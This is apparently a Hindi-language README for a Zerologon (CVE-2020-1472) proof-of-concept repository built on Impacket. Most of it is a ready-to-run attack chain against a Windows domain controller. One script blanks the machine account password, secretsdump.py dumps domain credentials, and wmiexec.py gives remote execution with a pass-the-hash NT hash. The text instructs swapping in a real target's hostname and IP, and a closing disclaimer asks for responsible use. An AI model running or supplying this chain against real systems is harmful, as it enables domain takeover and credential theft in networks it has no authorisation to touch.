
CVE-2020-1472 (Zerologon) के लिए एक व्यावहारिक प्रूफ-ऑफ-कॉन्सेप्ट जो Impacket लाइब्रेरी का उपयोग करके Netlogon कमजोरी का शोषण करता है और अनधिकृत डोमेन कंट्रोलर पहुंच प्राप्त करता है।
इस रिपॉजिटरी में Zerologon शोषण का एक अद्यतन कार्यान्वयन (2024) शामिल है जो CVE-2020-1472 (Zerologon) का शोषण करने के लिए Impacket टूल्स के साथ संयुक्त है। यह शोषण विंडोज सर्वर वातावरणों को लक्षित करता है ताकि मशीन खाता पासवर्ड में हेरफेर किया जा सके और पार्श्व गति (lateral movement) की जा सके।
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 और 192.168.40.145 को लक्ष्य के वास्तविक होस्टनाम और IP पते से बदलें।इस टूल का जिम्मेदारी से उपयोग करें। स्पष्ट अनुमति के बिना सिस्टम का शोषण करने के लिए इस टूल का अनधिकृत उपयोग अवैध और अनैतिक है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।